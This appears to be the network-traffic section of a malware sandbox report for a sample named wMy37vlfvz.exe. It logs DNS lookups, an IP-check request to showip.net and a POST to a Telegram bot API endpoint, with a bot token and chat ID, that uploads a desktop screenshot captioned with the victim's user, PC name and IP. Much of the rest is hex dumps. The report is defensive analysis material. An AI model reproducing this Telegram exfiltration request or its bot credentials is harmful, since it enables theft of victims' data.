                                                                                      Nov 25, 2024 13:41:34.935712099 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:34.935934067 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:34.936024904 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:34.983329058 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:34.983730078 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:34.983802080 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:34.983942032 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:34.984179974 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:34.984261990 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.027328014 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.062927961 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.063106060 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.063133001 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.063230038 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.063460112 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.063513041 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.063582897 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.107326984 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.183921099 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.184148073 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.227335930 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.227437019 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.227615118 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.227704048 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.227730036 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.271337032 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.545762062 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.545954943 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.546030045 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.546082973 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.546134949 CET50013443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:35.546169043 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:35.828890085 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:36.069816113 CET44350013149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:36.793262959 CET44350013149.154.167.220192.168.2.6
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 25, 2024 13:39:35.100296974 CET5883053192.168.2.61.1.1.1
                                                                                      Nov 25, 2024 13:39:35.462301970 CET53588301.1.1.1192.168.2.6
                                                                                      Nov 25, 2024 13:40:13.360755920 CET5361353192.168.2.61.1.1.1
                                                                                      Nov 25, 2024 13:40:13.498394966 CET53536131.1.1.1192.168.2.6
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 25, 2024 13:39:35.100296974 CET192.168.2.61.1.1.10xd1fbStandard query (0)showip.netA (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:40:13.360755920 CET192.168.2.61.1.1.10xf0b1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 25, 2024 13:39:20.392765045 CET1.1.1.1192.168.2.60x68ddNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                      Nov 25, 2024 13:39:20.392765045 CET1.1.1.1192.168.2.60x68ddNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:39:35.462301970 CET1.1.1.1192.168.2.60xd1fbNo error (0)showip.net162.55.60.2A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 13:40:13.498394966 CET1.1.1.1192.168.2.60xf0b1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                      • api.telegram.org
                                                                                      • showip.net
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.649750162.55.60.2804304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:39:35.593403101 CET58OUTGET / HTTP/1.1
                                                                                      User-Agent: Project1
                                                                                      Host: showip.net
                                                                                      Nov 25, 2024 13:39:36.915432930 CET1236INHTTP/1.1 200 OK
                                                                                      Access-Control-Allow-Headers: *
                                                                                      Access-Control-Allow-Methods: *
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Date: Mon, 25 Nov 2024 12:39:36 GMT
                                                                                      Server: Caddy
                                                                                      Transfer-Encoding: chunked
                                                                                      Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED]
                                                                                      Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
                                                                                      Nov 25, 2024 13:39:36.915458918 CET1236INData Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f
                                                                                      Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;
                                                                                      Nov 25, 2024 13:39:36.915471077 CET1236INData Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72
                                                                                      Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
                                                                                      Nov 25, 2024 13:39:36.915529013 CET388INData Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20
                                                                                      Data Ascii: ge"))||(C()?A("Microsoft Edge"):B("Edg/"))||C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
                                                                                      Nov 25, 2024 13:39:36.915540934 CET1236INData Raw: 61 72 20 62 3d 48 28 61 29 3b 31 21 3d 3d 28 62 26 31 29 26 26 28 4f 62 6a 65 63 74 2e 69 73 46 72 6f 7a 65 6e 28 61 29 26 26 28 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 29 29 2c 49 28 61 2c 62 7c
                                                                                      Data Ascii: ar b=H(a);1!==(b&1)&&(Object.isFrozen(a)&&(a=Array.prototype.slice.call(a)),I(a,b|1))} var H=F?function(a){return a[F]|0}:function(a){return a.g|0},J=F?function(a){return a[F]}:function(a){return a.g},I=F?function(a,b){a[F]=b}:function(a
                                                                                      Nov 25, 2024 13:39:36.915553093 CET1236INData Raw: 65 3d 61 2e 6c 65 6e 67 74 68 2c 66 3d 64 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 61 5b 66 5d 3b 6e 75 6c 6c 21 3d 67 26 26 67 21 3d 3d 63 26 26 28 63 5b 66 2d 62 5d 3d 67 29 7d 61 2e 6c 65 6e 67 74 68 3d 64 2b 31 3b 61 5b 64 5d 3d 63 7d
                                                                                      Data Ascii: e=a.length,f=d;f<e;f++){var g=a[f];null!=g&&g!==c&&(c[f-b]=g)}a.length=d+1;a[d]=c};function Aa(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "boolean":return a?1:0;case "object":if(a&&!Array.isArray(a)&&ta&&null!=a&&a i
                                                                                      Nov 25, 2024 13:39:36.915564060 CET1236INData Raw: 28 65 2c 66 29 26 26 28 62 5b 66 5d 3d 63 28 65 5b 66 5d 29 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 44 61 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 69 66 28 6e 75 6c 6c 21 3d 61 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72
                                                                                      Data Ascii: (e,f)&&(b[f]=c(e[f]))}return a}function Da(a,b,c,d,e,f){if(null!=a){if(Array.isArray(a))a=e&&0==a.length&&H(a)&1?void 0:f&&H(a)&2?a:Ea(a,b,c,void 0!==d,e,f);else if(N(a)){var g={},h;for(h in a)Object.prototype.hasOwnProperty.call(a,h)&&(g[h]=D
                                                                                      Nov 25, 2024 13:39:36.915574074 CET1236INData Raw: 66 28 63 3e 3d 66 7c 7c 65 29 7b 65 3d 62 3b 69 66 28 62 26 32 35 36 29 66 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 65 6c 73 65 7b 69 66 28 6e 75 6c 6c 3d 3d 64 29 72 65 74 75 72 6e 3b 66 3d 61 5b 66 2b 28 28 62 3e 3e 39 26 31 29 2d 31 29 5d
                                                                                      Data Ascii: f(c>=f||e){e=b;if(b&256)f=a[a.length-1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)} function La(a,b){var c
                                                                                      Nov 25, 2024 13:39:36.915697098 CET1236INData Raw: 72 65 61 6b 7d 66 3d 21 30 7d 65 3d 62 3b 63 3d 21 63 3b 67 3d 4a 28 61 2e 68 29 3b 61 3d 4c 28 67 29 3b 67 3d 28 67 3e 3e 39 26 31 29 2d 31 3b 66 6f 72 28 76 61 72 20 68 2c 6b 2c 77 3d 30 3b 77 3c 64 2e 6c 65 6e 67 74 68 3b 77 2b 2b 29 69 66 28
                                                                                      Data Ascii: reak}f=!0}e=b;c=!c;g=J(a.h);a=L(g);g=(g>>9&1)-1;for(var h,k,w=0;w<d.length;w++)if(k=d[w],k<a){k+=g;var r=e[k];null==r?e[k]=c?O:wa():c&&r!==O&&va(r)}else h||(r=void 0,e.length&&N(r=e[e.length-1])?h=r:e.push(h={})),r=h[k],null==h[k]?h[k]=c?O:wa(
                                                                                      Nov 25, 2024 13:39:36.915710926 CET1236INData Raw: 6e 63 74 69 6f 6e 20 57 61 28 61 29 7b 74 68 69 73 2e 67 3d 61 7c 7c 70 2e 64 6f 63 75 6d 65 6e 74 7c 7c 64 6f 63 75 6d 65 6e 74 7d 57 61 2e 70 72 6f 74 6f 74 79 70 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29
                                                                                      Data Ascii: nction Wa(a){this.g=a||p.document||document}Wa.prototype.appendChild=function(a,b){a.appendChild(b)}; function Xa(a,b){a.src=b instanceof V&&b.constructor===V?b.g:"type_error:TrustedResourceUrl";var c,d;(c=(b=null==(d=(c=(a.ownerDocumen
                                                                                      Nov 25, 2024 13:39:37.035623074 CET1236INData Raw: 28 61 29 7b 69 66 28 61 2e 69 2e 62 6f 64 79 26 26 21 61 2e 6d 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 62 28 61 29 3b 70 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 62 28 61 2c
                                                                                      Data Ascii: (a){if(a.i.body&&!a.m){var b=function(){fb(a);p.setTimeout(function(){return gb(a,3)},50)};Za(a.l,a.u,2,!0,function(){p[a.o]||b()},b);a.m=!0}} function fb(a){for(var b=W(1,5),c=0;c<b;c++){var d=X(a);a.i.body.appendChild(d);a.j.push(d)}b=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.649841149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:40:15 UTC562OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:40:15 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 59 65 53 4b 73 4a 59 55 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotYeSKsJYU.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-25 12:40:15 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:15 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:40:15 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:15 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:40:15 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:15 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:40:15 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:15 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
